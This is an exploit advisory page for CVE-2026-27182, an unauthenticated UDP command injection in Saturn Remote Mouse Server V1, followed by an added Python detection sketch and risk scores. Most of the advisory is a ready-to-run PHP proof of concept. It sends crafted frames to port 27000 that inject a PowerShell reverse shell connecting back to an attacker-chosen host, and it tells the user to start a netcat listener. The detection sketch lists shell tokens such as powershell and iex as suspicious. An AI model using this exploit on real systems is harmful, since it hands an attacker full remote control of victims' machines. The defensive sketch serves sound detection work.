Saturn Remote Mouse Server 1 Command Injection

18 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Unauthenticated UDP frames on port 27000 allow remote code execution in Saturn Remote Mouse Server V1.

Related

Reporter | Title | Published
Circl | CVE-2026-27182 | 18 Feb 2026 22:19
CNNVD | Saturn Remote Mouse Server Access Control Error Vulnerability | 18 Feb 2026 00:00
CVE | CVE-2026-27182 | 18 Feb 2026 20:59
Cvelist | CVE-2026-27182 Saturn Remote Mouse Server UDP Command Injection RCE | 18 Feb 2026 20:59
NVD | CVE-2026-27182 | 18 Feb 2026 22:16
Positive Technologies | PT-2026-20518 | 18 Feb 2026 00:00
RedhatCVE | CVE-2026-27182 | 20 Feb 2026 01:22
Vulnrichment | CVE-2026-27182 Saturn Remote Mouse Server UDP Command Injection RCE | 18 Feb 2026 20:59

=============================================================================================================================================
    | # Title     : Saturn Remote Mouse Server V1 - UDP-based Command Injection Vulnerability                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.saturnremote.com/                                                                                               |
    =============================================================================================================================================
    
    [+] Summary    : A service component of Saturn Remote Mouse Server listens for unauthenticated UDP JSON-like frames on UDP port 27000. 
                     Improper input handling allows specially crafted frames to cause execution of arbitrary commands within the context 
                     of the service process, resulting in Remote Code Execution (RCE) on the target host accessible from the local network.
    
    [+] Impact:
    
    Remote, unauthenticated attackers on the same local network can send malformed or specially crafted UDP packets that the server parses and forwards to 
    a command execution sink, enabling arbitrary code execution under the service account. This may result in full system compromise depending on service privileges.
    
    [+] Vectors:
    
    - UDP packets containing JSON frames (port 27000) with fields which are concatenated or passed directly to OS execution functions or PowerShell without validation or sanitization.
    - No authentication or origin validation observed for packets arriving from local network.
    
    
    
    [+] POC : php poc.php --lhost 192.168.1.3 --lport 4444
    
    
    <?php
    
    function main() {
    
        $options = getopt("", ["lhost:", "lport:"]);
        
        if (!isset($options['lhost']) || !isset($options['lport'])) {
            echo "Usage: php " . basename(__FILE__) . " --lhost <LHOST> --lport <LPORT>\n";
            exit(1);
        }
        
        $lhost = $options['lhost'];
        $lport = intval($options['lport']);
        
        $UDP_IP = "192.168.1.109";
        $UDP_PORT = 27000;
    
        $messages = [
            "7b224973436f6e6e656374696e67223a2274727565227d",
            "7b22636f6e6e656374696f6e223a2022616374697665227d",
            "7b2241726561486569676874223a302c22417265615769647468223a302c22436f6d6d616e644e616d65223a225354415254222c2258223a302c2259223a307d",
            "7b224b6579223a22636d64227d",
            "7b224b6579223a225c6e227d",
        ];
    
        $ps_command = "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$lhost',$lport);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"";
        
        $hex_ps = bin2hex("{\"Key\": \"$ps_command\"}");
        $messages[] = $hex_ps;
        $messages[] = "7b224b6579223a225c6e227d";
        
        echo "[*] Sending UDP packets to $UDP_IP:$UDP_PORT\n";
        echo "[*] Target listener: $lhost:$lport\n\n";
        
        foreach ($messages as $i => $hex_msg) {
            $data = hex2bin($hex_msg);
            if ($data === false) {
                echo "[!] Invalid hex for message " . ($i + 1) . "\n";
                continue;
            }
    
            $fp = fsockopen("udp://$UDP_IP", $UDP_PORT, $errno, $errstr);
            if (!$fp) {
                echo "[!] Cannot open UDP socket: $errstr ($errno)\n";
                break;
            }
            
            fwrite($fp, $data);
            fclose($fp);
            
            echo "[+] Sent packet " . ($i + 1) . " (" . strlen($data) . " bytes)\n";
            
            sleep(1);
        }
        
        echo "\n[+] All packets sent!\n";
        echo "[*] Start your listener: nc -nlvp $lport\n";
    }
    
    main();
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
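
A detection sketch for the two vectors listed above (unvalidated frame fields, no origin validation), added here as an example and not part of the original advisory or the vendor's code. The `Key` and `CommandName` field names come from decoding the hex frames in the PoC; the length threshold, token watch list, `trusted_sources` set and the sample capture are assumptions.

```python
import json
import re

PORT = 27000      # UDP port named in the advisory
MAX_KEY_LEN = 8   # assumption: a normal key frame carries one keystroke or a short key name
# Assumed watch list of interpreter names; tune for the environment.
SHELL_TOKENS = re.compile(r"\b(?:powershell|cmd|iex)\b", re.IGNORECASE)

def inspect_frame(src_ip, payload, trusted_sources):
    """Return the reasons a UDP/27000 payload looks suspicious (empty list = clean)."""
    reasons = []
    if src_ip not in trusted_sources:
        reasons.append("untrusted-source")
    text = payload.decode("utf-8", errors="replace")
    try:
        frame = json.loads(text)
    except ValueError:
        # The advisory calls the frames "JSON-like": a frame that fails
        # strict parsing is still inspected as raw text, not skipped.
        reasons.append("malformed-json")
        frame = {}
    key = frame.get("Key") if isinstance(frame, dict) else None
    if isinstance(key, str) and len(key) > MAX_KEY_LEN:
        reasons.append("long-key-value")
    if SHELL_TOKENS.search(text):
        reasons.append("shell-token")
    return reasons

def triage(capture, trusted_sources):
    """Keep only the flagged (src_ip, reasons) pairs from a list of (src_ip, payload)."""
    findings = []
    for src_ip, payload in capture:
        reasons = inspect_frame(src_ip, payload, trusted_sources)
        if reasons:
            findings.append((src_ip, reasons))
    return findings

# Constructed sample capture (not real traffic); 192.0.2.0/24 is a documentation range.
SAMPLE = [
    ("192.0.2.10", b'{"Key":"a"}'),
    ("192.0.2.10", b'{"AreaHeight":0,"AreaWidth":0,"CommandName":"START","X":0,"Y":0}'),
    ("192.0.2.77", b'{"Key":"cmd"}'),
    ("192.0.2.77", b'{"Key": "powershell -nop -c "<constructed placeholder>""}'),
]

if __name__ == "__main__":
    for src, why in triage(SAMPLE, trusted_sources={"192.0.2.10"}):
        print(src, ",".join(why))
```

Feed it payloads extracted from a packet capture filtered on UDP port 27000; blocking that port at the host firewall for all but the paired controller remains the primary mitigation for the missing origin check.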

18 Feb 2026 00:00 (current)
Vulners AI Score: 6.8 (Medium risk)
CVSS 3.1: 8.4
CVSS 4: 8.6
EPSS: 0.01209